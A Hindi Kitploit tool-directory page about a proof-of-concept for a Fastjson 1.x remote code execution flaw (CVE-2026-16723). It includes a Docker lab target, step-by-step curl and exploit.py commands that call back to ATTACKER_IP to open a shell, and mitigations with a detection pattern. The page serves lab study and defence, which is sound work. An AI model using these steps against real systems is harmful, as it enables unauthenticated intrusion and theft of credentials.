Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-16723 — Fastjson RCE (CVE-2026-16723) के लिए PoC एक्सप्लॉइट, जिसमें स्वचालित JAR पेलोड निर्माण और तैयार किए गए JSON के माध्यम से डिलीवरी शामिल है, जो AutoType प्रतिबंधों को बायपास करता है। | Kitploit
उपकरण/GitHubGitHub/eqstlab/cve-2026-16723
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणलर्निंग और शिक्षारेड टीमिंगपेलोड डेवलपमेंट
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

Fastjson RCE (CVE-2026-16723) के लिए PoC एक्सप्लॉइट, जिसमें स्वचालित JAR पेलोड निर्माण और तैयार किए गए JSON के माध्यम से डिलीवरी शामिल है, जो AutoType प्रतिबंधों को बायपास करता है।

रिपॉजिटरी देखें
122 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


अवलोकन

CVE-2026-16723 Fastjson 1.x (1.2.68 – 1.2.83) में एक रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है। जब Fastjson हमलावर-नियंत्रित JSON पार्स करता है, तो एक क्राफ्टेड @type मान checkAutoType के अंदर क्लास-संसाधन लुकअप में बदल जाता है। Spring Boot एक्ज़ीक्यूटेबल fat-JAR में क्लास लोडर उस नाम को jar:http:// URL के रूप में हल करता है और एक दूरस्थ JAR (SSRF) लाता है, फिर @JSONType एनोटेशन वाली क्लास लोड करता है, भले ही AutoType अक्षम हो। चूँकि आधुनिक JDK / Tomcat jar:http:// बाइनरी नाम को अस्वीकार कर देता है, विश्वसनीय वैरिएंट JAR को JVM कैश में सीड करता है और उसे jar:file:/proc/self/fd/N के माध्यम से फिर से पढ़ता है, जिससे क्लास परिभाषित होती है और उसका स्टैटिक इनिशियलाइज़र चलता है, जिससे कोड एक्ज़ीक्यूशन होता है। AutoType अक्षम रहता है और किसी classpath गैजेट की आवश्यकता नहीं होती।


प्रभावित संस्करण

श्रेणीसंस्करण
संवेदनशीलFastjson 1.2.68 ≤ संस्करण ≤ 1.2.83
पैच किया गयाFastjson 2.x पर माइग्रेट करें (कोई फिक्स्ड 1.x रिलीज़ नहीं)

प्रभाव

  • सेवा खाते के रूप में रिमोट कोड एक्ज़ीक्यूशन
  • होस्ट और पर्यावरण से गोपनीय जानकारी / क्रेडेंशियल प्रकटीकरण
  • प्रभावित एप्लिकेशन से पूर्ण समझौता

पर्यावरण

लैब टारगेट एक सार्वजनिक स्टोरफ्रंट (Northwind Store) है जिसका सर्च API अपने रिक्वेस्ट बॉडी को Fastjson के साथ बाइंड करता है। सब कुछ Fastjson का स्टॉक डिफ़ॉल्ट है: SafeMode बंद, AutoType बंद, Spring Boot fat-JAR के रूप में पैकेज्ड।

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
पूर्वशर्तइस लैब में स्थिति
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot एक्ज़ीक्यूटेबल fat-JARहाँ
बिना प्रमाणीकरण JSON पार्स पथPOST /api/products/search
SafeMode / AutoTypeडिफ़ॉल्ट (दोनों बंद)

PoC

हमलावर और टारगेट एक ही Docker bridge नेटवर्क पर चलते हैं, इसलिए टारगेट हमलावर तक आउटबाउंड कनेक्शन के रूप में पहुँचता है (कोई अतिरिक्त पोर्ट प्रकाशित नहीं होता)।

चरण 1. टारगेट चालू है इसकी पुष्टि करें

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

चरण 2. हमलावर मशीन पर एक्सप्लॉइट चलाएँ

exploit.py पेलोड JAR बनाता है, उसे सर्व करता है, एक लिसनर शुरू करता है, और रिक्वेस्ट बॉडी प्रिंट करता है। केवल कॉलबैक पता आवश्यक है।

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

चरण 3. पेलोड डिलीवर करें

प्रिंट की गई बॉडी को सर्च एंडपॉइंट (Burp Repeater या curl) में पेस्ट करें और भेजें। सर्च रिक्वेस्ट एक सामान्य सुविधा है; केवल इसका JSON बॉडी क्राफ्ट किया गया है।

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

चरण 4. परिणाम की पुष्टि करें

कोड सेवा खाते के रूप में चलता है। प्राप्त शेल के माध्यम से फ्लैग प्राप्त करें:

root@kitploit:~
whoami

शमन

  • Fastjson 2.x पर माइग्रेट करें
  • या com.alibaba:fastjson:1.2.83_noneautotype चलाएँ
  • या JVM को -Dfastjson.parser.safeMode=true के साथ शुरू करें
  • पहचान: JSON @type मान जिनमें jar:http या jar:file / /proc/self/fd पैटर्न हों

विश्लेषण

  • KR:
  • EN:
टूल डाउनलोड करें